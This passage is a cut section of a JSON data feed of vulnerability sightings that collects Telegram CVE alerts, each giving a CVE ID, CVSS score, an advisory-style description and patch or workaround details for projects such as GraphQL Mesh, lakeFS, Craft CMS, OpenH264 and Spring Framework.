https://github.com/netty/netty/security/advisories/GHSA-xq3w-v528-46rv\n\ud83d\udccf Published: 2025-02-10T18:14:47Z\n\ud83d\udccf Modified: 2025-02-14T15:02:31Z\n\ud83d\udd17 References:\n1. https://github.com/netty/netty/security/advisories/GHSA-389x-839f-4rhx\n2. https://nvd.nist.gov/vuln/detail/CVE-2025-25193\n3. https://github.com/netty/netty/commit/d1fbda62d3a47835d3fb35db8bd42ecc205a5386\n4. https://github.com/netty/netty", "creation_timestamp": "2025-02-14T15:15:16.000000Z"}, {"uuid": "613c13f6-2628-427e-9436-3961dbe0648b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-J2WH-WRV3-4X4G", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/4811", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-27098\n\ud83d\udd25 CVSS Score: 5.8 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:L)\n\ud83d\udd39 Description: GraphQL Mesh is a GraphQL Federation framework and gateway for both GraphQL Federation and non-GraphQL Federation subgraphs, non-GraphQL services, such as REST and gRPC, and also databases such as MongoDB, MySQL, and PostgreSQL. Missing check vulnerability in the static file handler allows any client to access the files in the server's file system. When `staticFiles` is set in the `serve` settings in the configuration file, the following handler doesn't check if `absolutePath` is still under the directory provided as `staticFiles`. Users have two options to fix vulnerability; 1. Update `@graphql-mesh/cli` to a version higher than `0.82.21`, and if you use `@graphql-mesh/http`, update it to a version higher than `0.3.18` 2. Remove `staticFiles` option from the configuration, and use other solutions to serve static files.\n\ud83d\udccf Published: 2025-02-20T20:13:01.242Z\n\ud83d\udccf Modified: 2025-02-20T21:04:05.183Z\n\ud83d\udd17 References:\n1. https://github.com/ardatan/graphql-mesh/security/advisories/GHSA-j2wh-wrv3-4x4g", "creation_timestamp": "2025-02-20T21:17:42.000000Z"}, {"uuid": "d51d5bc0-3ac2-4fb5-9f5f-5ac1acb45529", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-RR4X-CRHF-8886", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/4814", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-27097\n\ud83d\udd25 CVSS Score: 5.1 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N)\n\ud83d\udd39 Description: GraphQL Mesh is a GraphQL Federation framework and gateway for both GraphQL Federation and non-GraphQL Federation subgraphs, non-GraphQL services, such as REST and gRPC, and also databases such as MongoDB, MySQL, and PostgreSQL. When a user transforms on the root level or single source with transforms, and the client sends the same query with different variables, the initial variables are used in all following requests until the cache evicts DocumentNode. If a token is sent via variables, the following requests will act like the same token is sent even if the following requests have different tokens. This can cause a short memory leak but it won't grow per each request but per different operation until the cache evicts DocumentNode by LRU mechanism.\n\ud83d\udccf Published: 2025-02-20T20:15:53.648Z\n\ud83d\udccf Modified: 2025-02-20T21:01:18.158Z\n\ud83d\udd17 References:\n1. https://github.com/ardatan/graphql-mesh/security/advisories/GHSA-rr4x-crhf-8886", "creation_timestamp": "2025-02-20T21:17:47.000000Z"}, {"uuid": "d969c57c-7bf1-457b-b6f8-7e58c9f26ab7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-J856-WH9M-9VPM", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/4798", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-27096\n\ud83d\udd25 CVSS Score: 9.4 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H)\n\ud83d\udd39 Description: WeGIA is a Web Manager for Institutions with a focus on Portuguese language. A SQL Injection vulnerability was discovered in the WeGIA application, personalizacao_upload.php endpoint. This vulnerability allow an authorized attacker to execute arbitrary SQL queries, allowing access to sensitive information. This issue has been addressed in version 3.2.14 and all users are advised to upgrade. There are no known workarounds for this vulnerability.\n\ud83d\udccf Published: 2025-02-20T19:07:43.031Z\n\ud83d\udccf Modified: 2025-02-20T19:07:43.031Z\n\ud83d\udd17 References:\n1. https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-j856-wh9m-9vpm", "creation_timestamp": "2025-02-20T19:49:27.000000Z"}, {"uuid": "88d3a9f7-9bb3-4bc7-8d72-a68495995ab2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-J7JW-28JM-WHR6", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/4840", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-27100\n\ud83d\udd25 CVSS Score: 6.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: lakeFS is an open-source tool that transforms your object storage into a Git-like repository. In affected versions an authenticated user can crash lakeFS by exhausting server memory.  This is an authenticated denial-of-service issue. This problem has been patched in version 1.50.0. Users on versions 1.49.1 and below are affected. Users are advised to upgrade. Users unable to upgrade should either set the environment variable `LAKEFS_BLOCKSTORE_S3_DISABLE_PRE_SIGNED_MULTIPART` to `true` or configure the `disable_pre_signed_multipart` key to true in their config yaml.\n\ud83d\udccf Published: 2025-02-21T00:03:01.411Z\n\ud83d\udccf Modified: 2025-02-21T00:03:01.411Z\n\ud83d\udd17 References:\n1. https://github.com/treeverse/lakeFS/security/advisories/GHSA-j7jw-28jm-whr6\n2. https://github.com/treeverse/lakeFS/commit/3a625752acdf3f8e137bec20451e71d0f9fa82f2", "creation_timestamp": "2025-02-21T00:17:47.000000Z"}, {"uuid": "b9466e41-7d3d-4db0-9028-38428c6aa569", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-X684-96HH-833X", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/4860", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-23209\n\ud83d\udd25 CVSS Score: 8.1 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H)\n\ud83d\udd39 Description: Craft is a flexible, user-friendly CMS for creating custom digital experiences on the web and beyond. This is an remote code execution (RCE) vulnerability that affects Craft 4 and 5 installs where your security key has already been compromised. Anyone running an unpatched version of Craft with a compromised security key is affected. This vulnerability has been patched in Craft 5.5.8 and 4.13.8. Users who cannot update to a patched version, should rotate their security keys and ensure their privacy to help migitgate the issue.\n\ud83d\udccf Published: 2025-01-18T00:32:54.954Z\n\ud83d\udccf Modified: 2025-02-21T04:56:11.988Z\n\ud83d\udd17 References:\n1. https://github.com/craftcms/cms/security/advisories/GHSA-x684-96hh-833x\n2. https://github.com/craftcms/cms/commit/e59e22b30c9dd39e5e2c7fe02c147bcbd004e603\n3. https://craftcms.com/knowledge-base/securing-craft#keep-your-secrets-secret", "creation_timestamp": "2025-02-21T05:18:29.000000Z"}, {"uuid": "db157e21-6ecb-4355-81bc-732785105ca1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-78CV-45VX-Q6FR", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/4799", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-26618\n\ud83d\udd25 CVSS Score: 7 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:H)\n\ud83d\udd39 Description: Erlang is a programming language and runtime system for building massively scalable soft real-time systems with requirements on high availability. OTP is a set of Erlang libraries, which consists of the Erlang runtime system, a number of ready-to-use components mainly written in Erlang. Packet size is not verified properly for SFTP packets. As a result when multiple SSH packets (conforming to max SSH packet size) are received by ssh, they might be combined into an SFTP packet which will exceed the max allowed packet size and potentially cause large amount of memory to be allocated. Note that situation described above can only happen for successfully authenticated users after completing the SSH handshake. This issue has been patched in OTP versions 27.2.4, 26.2.5.9, and 25.3.2.18. There are no known workarounds for this vulnerability.\n\ud83d\udccf Published: 2025-02-20T19:04:54.691Z\n\ud83d\udccf Modified: 2025-02-20T19:05:07.412Z\n\ud83d\udd17 References:\n1. https://github.com/erlang/otp/security/advisories/GHSA-78cv-45vx-q6fr\n2. https://github.com/erlang/otp/commit/0ed2573cbd55c92e9125c9dc70fa1ca7fed82872", "creation_timestamp": "2025-02-20T19:49:28.000000Z"}, {"uuid": "652aa177-6e59-423e-a6fc-bb26b625268f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-M99Q-5J7X-7M9X", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/4804", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-27091\n\ud83d\udd25 CVSS Score: 8.6 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N)\n\ud83d\udd39 Description: OpenH264 is a free license codec library which supports H.264 encoding and decoding. A vulnerability in the decoding functions of OpenH264 codec library could allow a remote, unauthenticated attacker to trigger a heap overflow. This vulnerability is due to a race condition between a Sequence Parameter Set (SPS) memory allocation and a subsequent non Instantaneous Decoder Refresh (non-IDR) Network Abstraction Layer (NAL) unit memory usage. An attacker could exploit this vulnerability by crafting a malicious bitstream and tricking a victim user into processing an arbitrary video containing the malicious bistream. An exploit could allow the attacker to cause an unexpected crash in the victim's user decoding client and, possibly, perform arbitrary commands on the victim's host by abusing the heap overflow. This vulnerability affects OpenH264 2.5.0 and earlier releases. Both Scalable Video Coding (SVC) mode and Advanced Video Coding (AVC) mode are affected by this vulnerability. OpenH264 software releases 2.6.0 and later contained the fix for this vulnerability. Users are advised to upgrade. There are no known workarounds for this vulnerability.\n\n### For more information\n\nIf you have any questions or comments about this advisory:\n* [Open an issue in cisco/openh264](https://github.com/cisco/openh264/issues)\n* Email Cisco Open Source Security ([oss-security@cisco.com](mailto:oss-security@cisco.com)) and Cisco PSIRT ([psirt@cisco.com](mailto:psirt@cisco.com))\n\n### Credits:\n\n* **Research:** Octavian Guzu and Andrew Calvano of Meta\n* **Fix ideation:** Philipp Hancke and Shyam Sadhwani of Meta\n* **Fix implementation:** Benzheng Zhang (@BenzhengZhang)\n* **Release engineering:** Benzheng Zhang (@BenzhengZhang)\n\ud83d\udccf Published: 2025-02-20T17:50:03.191Z\n\ud83d\udccf Modified: 2025-02-20T18:40:39.421Z\n\ud83d\udd17 References:\n1. https://github.com/cisco/openh264/security/advisories/GHSA-m99q-5j7x-7m9x\n2. https://github.com/cisco/openh264/releases/tag/v2.6.0", "creation_timestamp": "2025-02-20T19:49:35.000000Z"}, {"uuid": "9b4e7b76-709c-4cc0-8f7a-5827119ea082", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4W26-8P97-F4JP", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/5044", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-27105\n\ud83d\udd25 CVSS Score: 2.3 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N)\n\ud83d\udd39 Description: vyper is a Pythonic Smart Contract Language for the EVM. Vyper handles AugAssign statements by first caching the target location to avoid double evaluation. However, in the case when target is an access to a DynArray and the rhs modifies the array, the cached target will evaluate first, and the bounds check will not be re-evaluated during the write portion of the statement. This issue has been addressed in version 0.4.1 and all users are advised to upgrade. There are no known workarounds for this vulnerability.\n\ud83d\udccf Published: 2025-02-21T21:27:28.056Z\n\ud83d\udccf Modified: 2025-02-22T15:37:28.734Z\n\ud83d\udd17 References:\n1. https://github.com/vyperlang/vyper/security/advisories/GHSA-4w26-8p97-f4jp", "creation_timestamp": "2025-02-22T16:25:15.000000Z"}, {"uuid": "9f38b251-c070-442e-bf48-dbc1c28b25bb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-PP9M-QF39-HXJC", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/4824", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-27088\n\ud83d\udd25 CVSS Score: 8.4 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:N/VA:N/SC:H/SI:H/SA:N)\n\ud83d\udd39 Description: oxyno-zeta/s3-proxy is an aws s3 proxy written in go. In affected versions a Reflected Cross-site Scripting (XSS) vulnerability enables attackers to create malicious URLs that, when visited, inject scripts into the web application. This can lead to session hijacking or phishing attacks on a trusted domain, posing a moderate risk to all users. It's possible to inject html elements, including scripts through the folder-list template. The affected template allows users to interact with the URL path provided by the `Request.URL.Path` variable, which is then rendered directly into the HTML without proper sanitization or escaping. This can be abused by attackers who craft a malicious URL containing injected HTML or JavaScript. When users visit such a URL, the malicious script will be executed in the user's context. This issue has been addressed in version 4.18.1 and all users are advised to upgrade. There are no known workarounds for this vulnerability.\n\ud83d\udccf Published: 2025-02-20T22:33:50.646Z\n\ud83d\udccf Modified: 2025-02-20T22:33:50.646Z\n\ud83d\udd17 References:\n1. https://github.com/oxyno-zeta/s3-proxy/security/advisories/GHSA-pp9m-qf39-hxjc\n2. https://github.com/oxyno-zeta/s3-proxy/commit/c611c741ed4872ea3f46232be23bb830f96f9564\n3. https://github.com/oxyno-zeta/s3-proxy/blob/master/templates/folder-list.tpl#L19C21-L19C38", "creation_timestamp": "2025-02-20T23:16:57.000000Z"}, {"uuid": "fffcc5ab-315a-4bd4-bbad-750eff0aceea", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-PWF8-5Q9W-M763", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/4866", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-0726\n\ud83d\udd25 CVSS Score: 7.1 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N)\n\ud83d\udd39 Description: In NetX HTTP server functionality of Eclipse ThreadX NetX Duo before \nversion 6.4.2, an attacker can cause a denial of service by specially \ncrafted packets. The core issue is missing closing of a file in case of \nan error condition, resulting in the 404 error for each further file \nrequest. Users can work-around the issue by disabling the PUT request \nsupport.\n\ud83d\udccf Published: 2025-02-21T08:12:11.703Z\n\ud83d\udccf Modified: 2025-02-21T08:12:11.703Z\n\ud83d\udd17 References:\n1. https://github.com/eclipse-threadx/netxduo/commit/c78d650be7377aae1a8704bc0ce5cc6f9f189014\n2. https://github.com/eclipse-threadx/netxduo/security/advisories/GHSA-pwf8-5q9w-m763", "creation_timestamp": "2025-02-21T08:18:01.000000Z"}, {"uuid": "19b44ab6-db43-4462-99d0-be0dab67caaf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-27XQ-W3JC-436C", "type": "seen", "source": "https://t.me/securixy_kz/827", "content": "", "creation_timestamp": "2026-07-13T00:00:36.647216Z"}, {"uuid": "8b3cac1a-7ef3-4f53-91a2-a71c62104005", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-G5FM-JQ4J-C2C7", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/5297", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-11955\n\ud83d\udd25 CVSS Score: 5.3 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N)\n\ud83d\udd39 Description: A vulnerability was found in GLPI up to 10.0.17. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file /index.php. The manipulation of the argument redirect leads to open redirect. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 10.0.18 is able to address this issue. It is recommended to upgrade the affected component.\n\ud83d\udccf Published: 2025-02-25T15:07:56.854Z\n\ud83d\udccf Modified: 2025-02-25T15:07:56.854Z\n\ud83d\udd17 References:\n1. https://vuldb.com/?id.296809\n2. https://vuldb.com/?ctiid.296809\n3. https://vuldb.com/?submit.451775\n4. https://github.com/glpi-project/glpi/security/advisories/GHSA-g5fm-jq4j-c2c7\n5. https://github.com/glpi-project/glpi/releases/tag/10.0.18", "creation_timestamp": "2025-02-25T15:23:16.000000Z"}, {"uuid": "cb9d4756-5947-4b4f-9643-ecfadd45fff5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9VFV-C966-JWRV", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/3917", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-37308\n\ud83d\udd25 CVSS Score: N/A\n\ud83d\udd39 Description: No description available\n\ud83d\udccf Published: 2024-06-13T14:15:12.807\n\ud83d\udccf Modified: N/A\n\ud83d\udd17 References:\n1. https://github.com/XjSv/Cooked/commit/8cf88f334ccbf11134080bbb655c66f1cfe77026\n2. https://github.com/XjSv/Cooked/security/advisories/GHSA-9vfv-c966-jwrv\n3. https://github.com/XjSv/Cooked/commit/8cf88f334ccbf11134080bbb655c66f1cfe77026\n4. https://github.com/XjSv/Cooked/security/advisories/GHSA-9vfv-c966-jwrv", "creation_timestamp": "2025-02-11T21:12:33.000000Z"}, {"uuid": "c6b67160-27f1-42a5-87b1-dfa90d8d5252", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-R9PX-M959-CXF4", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/3661", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-21614\n\ud83d\udd25 CVSS Score: 7.5 (CVSS_V3)\n\ud83d\udd39 Description: ### Impact\nA denial of service (DoS) vulnerability was discovered in go-git versions prior to `v5.13`. This vulnerability allows an attacker to perform denial of service attacks by providing specially crafted responses from a Git server which triggers resource exhaustion in `go-git` clients. \n\nThis is a `go-git` implementation issue and does not affect the upstream `git` cli.\n\n### Patches\nUsers running versions of `go-git` from `v4` and above are recommended to upgrade to `v5.13` in order to mitigate this vulnerability.\n\n### Workarounds\nIn cases where a bump to the latest version of `go-git` is not possible, we recommend limiting its use to only trust-worthy Git servers.\n\n## Credit\nThanks to Ionut Lalu for responsibly disclosing this vulnerability to us.\n\n\ud83d\udccf Published: 2025-01-06T16:20:28Z\n\ud83d\udccf Modified: 2025-01-31T14:42:21Z\n\ud83d\udd17 References:\n1. https://github.com/go-git/go-git/security/advisories/GHSA-r9px-m959-cxf4\n2. https://nvd.nist.gov/vuln/detail/CVE-2025-21614\n3. https://github.com/go-git/go-git", "creation_timestamp": "2025-01-31T15:14:55.000000Z"}, {"uuid": "878daaec-04d5-42d9-990a-92b1db3f7210", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-QR6X-62GQ-4CCP", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/3674", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-23367\n\ud83d\udd25 CVSS Score: 6.4 (CVSS_V3)\n\ud83d\udd39 Description: A flaw was found in the Wildfly Server Role Based Access Control (RBAC) provider. When authorization to control management operations is secured using the Role Based Access Control provider, a user without the required privileges can suspend or resume the server. A user with a Monitor or Auditor role is supposed to have only read access permissions and should not be able to suspend the server. The vulnerability is caused by the Suspend and Resume handlers not performing authorization checks to validate whether the current user has the required permissions to proceed with the action.\n\n### Impact\nStandalone server (Domain mode is not affected) with use access control enabled with RBAC provider can be suspended or resumed by unauthorized users. When a server is suspended, the server will stop receiving user requests. The resume handle does the opposite; it will cause a suspended server to start accepting user requests.\n\n### Patches\nFixed in [WildFly Core 27.0.1.Final](https://github.com/wildfly/wildfly-core/releases/tag/27.0.1.Final)\n\n### Workarounds\nNo workaround available\n\n### References\nSee also: https://issues.redhat.com/browse/WFCORE-7153\n\n### Acknowledgements\nThe WildFly project would like to thank Claudia Bartolini (TIM S.p.A), Marco Ventura (TIM S.p.A), and Massimiliano Brolli (TIM S.p.A) for reporting this issue. https://www.gruppotim.it/it/footer/red-team.html\n\n\ud83d\udccf Published: 2025-01-31T17:34:30Z\n\ud83d\udccf Modified: 2025-01-31T17:34:30Z\n\ud83d\udd17 References:\n1. https://github.com/wildfly/wildfly-core/security/advisories/GHSA-qr6x-62gq-4ccp\n2. https://nvd.nist.gov/vuln/detail/CVE-2025-23367\n3. https://access.redhat.com/security/cve/CVE-2025-23367\n4. https://bugzilla.redhat.com/show_bug.cgi?id=2337620\n5. https://github.com/wildfly/wildfly-core", "creation_timestamp": "2025-01-31T18:15:44.000000Z"}, {"uuid": "045714cc-fe74-4c5d-9a28-fe95ce9b8fce", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2018:2939", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/3675", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2018-1275\n\ud83d\udd25 CVSS Score: 9.8 (CVSS_V3)\n\ud83d\udd39 Description: Spring Framework, versions 5.0 prior to 5.0.5 and versions 4.3 prior to 4.3.16 and older unsupported versions, allow applications to expose STOMP over WebSocket endpoints with a simple, in-memory STOMP broker through the spring-messaging module. A malicious user (or attacker) can craft a message to the broker that can lead to a remote code execution attack. This CVE addresses the partial fix for CVE-2018-1270 in the 4.3.x branch of the Spring Framework.\n\ud83d\udccf Published: 2018-10-17T20:28:00Z\n\ud83d\udccf Modified: 2025-01-31T19:03:33Z\n\ud83d\udd17 References:\n1. https://nvd.nist.gov/vuln/detail/CVE-2018-1275\n2. https://github.com/spring-projects/spring-framework/commit/0009806debb578e884f6dc98bd1f2dc668020021\n3. https://github.com/spring-projects/spring-framework/commit/e0de9126ed8cf25cf141d3e66420da94e350708a\n4. https://access.redhat.com/errata/RHSA-2018:1320\n5. https://access.redhat.com/errata/RHSA-2018:2939\n6. https://github.com/spring-projects/spring-framework\n7. https://lists.apache.org/thread.html/4ed49b103f64a0cecb38064f26cbf1389afc12124653da2d35166dbe@%3Cissues.activemq.apache.org%3E\n8. https://lists.apache.org/thread.html/ab825fcade0b49becfa30235b3d54f4a51bb74ea96b6c9adb5d1378c@%3Cissues.activemq.apache.org%3E\n9. https://lists.apache.org/thread.html/dcf8599b80e43a6b60482607adb76c64672772dc2d9209ae2170f369@%3Cissues.activemq.apache.org%3E\n10. https://pivotal.io/security/cve-2018-1275\n11. https://web.archive.org/web/20190901081835/http://www.securitytracker.com/id/1041301\n12. https://web.archive.org/web/20200227033125/http://www.securityfocus.com/bid/103771\n13. https://www.oracle.com/security-alerts/cpujul2020.html\n14. https://www.oracle.com/security-alerts/cpuoct2021.html\n15. https://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html\n16. https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html\n17. http://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html\n18. http://www.oracle.com/technetwork/security-advisory/cpuoct2018-4428296.html", "creation_timestamp": "2025-01-31T19:15:57.000000Z"}, {"uuid": "d3e7894d-aff5-4aa2-8b9c-31fe3e69701d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2018:1320", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/3675", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2018-1275\n\ud83d\udd25 CVSS Score: 9.8 (CVSS_V3)\n\ud83d\udd39 Description: Spring Framework, versions 5.0 prior to 5.0.5 and versions 4.3 prior to 4.3.16 and older unsupported versions, allow applications to expose STOMP over WebSocket endpoints with a simple, in-memory STOMP broker through the spring-messaging module. A malicious user (or attacker) can craft a message to the broker that can lead to a remote code execution attack. This CVE addresses the partial fix for CVE-2018-1270 in the 4.3.x branch of the Spring Framework.\n\ud83d\udccf Published: 2018-10-17T20:28:00Z\n\ud83d\udccf Modified: 2025-01-31T19:03:33Z\n\ud83d\udd17 References:\n1. https://nvd.nist.gov/vuln/detail/CVE-2018-1275\n2. https://github.com/spring-projects/spring-framework/commit/0009806debb578e884f6dc98bd1f2dc668020021\n3. https://github.com/spring-projects/spring-framework/commit/e0de9126ed8cf25cf141d3e66420da94e350708a\n4. https://access.redhat.com/errata/RHSA-2018:1320\n5. https://access.redhat.com/errata/RHSA-2018:2939\n6. https://github.com/spring-projects/spring-framework\n7. https://lists.apache.org/thread.html/4ed49b103f64a0cecb38064f26cbf1389afc12124653da2d35166dbe@%3Cissues.activemq.apache.org%3E\n8. https://lists.apache.org/thread.html/ab825fcade0b49becfa30235b3d54f4a51bb74ea96b6c9adb5d1378c@%3Cissues.activemq.apache.org%3E\n9. https://lists.apache.org/thread.html/dcf8599b80e43a6b60482607adb76c64672772dc2d9209ae2170f369@%3Cissues.activemq.apache.org%3E\n10. https://pivotal.io/security/cve-2018-1275\n11. https://web.archive.org/web/20190901081835/http://www.securitytracker.com/id/1041301\n12. https://web.archive.org/web/20200227033125/http://www.securityfocus.com/bid/103771\n13. https://www.oracle.com/security-alerts/cpujul2020.html\n14. https://www.oracle.com/security-alerts/cpuoct2021.html\n15. https://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html\n16. https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html\n17. http://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html\n18. http://www.oracle.com/technetwork/security-advisory/cpuoct2018-4428296.html", "creation_timestamp": "2025-01-31T19:15:57.000000Z"}, {"uuid": "21dff982-125a-4b11-a32d-22a203043f4d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-MM6V-68QP-F9FW", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/4172", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: GHSA-mm6v-68qp-f9fw\n\ud83d\udd25 CVSS Score: 9.8 (CVSS_V3)\n\ud83d\udd39 Description: ### Impact\n\nRemote code execution may be possible in web-accessible installations of Homarus in certain configurations.\n\n### Patches\n\nThe issue has been patched in `islandora/crayfish:4.1.0`\n\n### Workarounds\n\nThe exploit requires making a request against the Homarus's `/convert` endpoint; therefore, the ability to exploit is much reduced if the microservice is not directly accessible from the Internet, so: Prevent general access from the Internet from hitting Homarus.\n\nConfigure auth in Crayfish to be more strongly required, such that requests with `Authorization` headers that do not validate are rejected before the problematic CLI interpolation occurs.\n\n### References\n\n- XBOW-024-071\n\ud83d\udccf Published: 2025-01-15T22:04:19Z\n\ud83d\udccf Modified: 2025-02-13T00:44:33Z\n\ud83d\udd17 References:\n1. https://github.com/Islandora/Crayfish/security/advisories/GHSA-mm6v-68qp-f9fw\n2. https://github.com/Islandora/Crayfish/commit/64cb4cec688928798cc40e6f0a0e863d7f69fd89\n3. https://github.com/Islandora/Crayfish", "creation_timestamp": "2025-02-13T01:08:08.000000Z"}, {"uuid": "a99ad8b9-da78-4058-bcc5-0080a8503472", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", 